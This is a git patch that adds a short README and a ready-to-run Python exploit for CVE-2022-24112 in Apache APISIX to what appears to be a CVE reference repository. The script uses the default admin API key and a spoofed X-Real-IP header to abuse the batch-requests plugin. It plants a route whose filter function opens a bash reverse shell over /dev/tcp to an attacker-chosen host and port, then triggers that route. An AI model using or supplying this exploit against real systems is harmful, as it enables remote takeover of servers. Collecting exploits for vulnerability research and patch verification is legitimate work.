From b3a724b4e2bca4e5cf74b51f0fbc5dcbf3b4b552 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:55:32 +0000 Subject: [PATCH] add CVE-2022-24112 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- .../2022/cve-2022-24112/README.md | 21 +++++ .../2022/cve-2022-24112/apisix-exploit.py | 79 +++++++++++++++++++ 2 files changed, 100 insertions(+) create mode 100644 cve/Apache-APISIX/2022/cve-2022-24112/README.md create mode 100644 cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/README.md b/cve/Apache-APISIX/2022/cve-2022-24112/README.md new file mode 100644 index 00000000..c099b392 --- /dev/null +++ b/cve/Apache-APISIX/2022/cve-2022-24112/README.md @@ -0,0 +1,21 @@ +# Apache APISIX Remote Code Execution (CVE-2022-24112) Exploit + +## Summary +An attacker can abuse the batch-requests plugin to send requests to +bypass the IP restriction of Admin API. +A default configuration of Apache APISIX (with default API key) is +vulnerable to remote code execution. +When the admin key was changed or the port of Admin API was changed to +a port different from the data panel, the impact is lower. But there +is still a risk to bypass the IP restriction of Apache APISIX's data +panel. + +There is a check in the batch-requests plugin which overrides the +client IP with its real remote IP. But due to a bug in the code, this +check can be bypassed. + +## Remediation +upgrade to 2.10.4 or 2.12.1. + + + diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py b/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py new file mode 100644 index 00000000..d8528165 --- /dev/null +++ b/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py @@ -0,0 +1,79 @@ +import requests +import sys + + +class color: + HEADER = '\033[95m' + IMPORTANT = '\33[35m' + NOTICE = '\033[33m' + OKBLUE = '\033[94m' + OKGREEN = '\033[92m' + WARNING = '\033[93m' + RED = '\033[91m' + END = '\033[0m' + UNDERLINE = '\033[4m' + LOGGING = '\33[34m' +color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING] + + +def banner(): + run = color_random[6]+'''\n . , + _.._ * __*\./ ___ _ \./._ | _ *-+- + (_][_)|_) |/'\ (/,/'\[_)|(_)| | + | | +\n''' + run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n''' + run3 = color_random[4]+'''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n''' + print(run+run2+run3) + +if (len(sys.argv) != 4): + banner() + print("[!] Usage : ./apisix-exploit.py ") + exit() + +else: + banner() + target_url = sys.argv[1] + lhost = sys.argv[2] + lport = sys.argv[3] + +headers1 = { + 'Host': '127.0.0.1:8080', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', + 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', + 'Accept': '*/*', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/json', + 'Content-Length': '540', + 'Connection': 'close', +} + +headers2 = { + 'Host': '127.0.0.1:8080', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', + 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', + 'Accept': '*/*', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/json', + 'Connection': 'close', +} + +json_data = { + 'headers': { + 'X-Real-IP': '127.0.0.1', + 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', + 'Content-Type': 'application/json', + }, + 'timeout': 1500, + 'pipeline': [ + { + 'path': '/apisix/admin/routes/index', + 'method': 'PUT', + 'body': '{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}', + }, + ], +} + +response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False) + +response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False)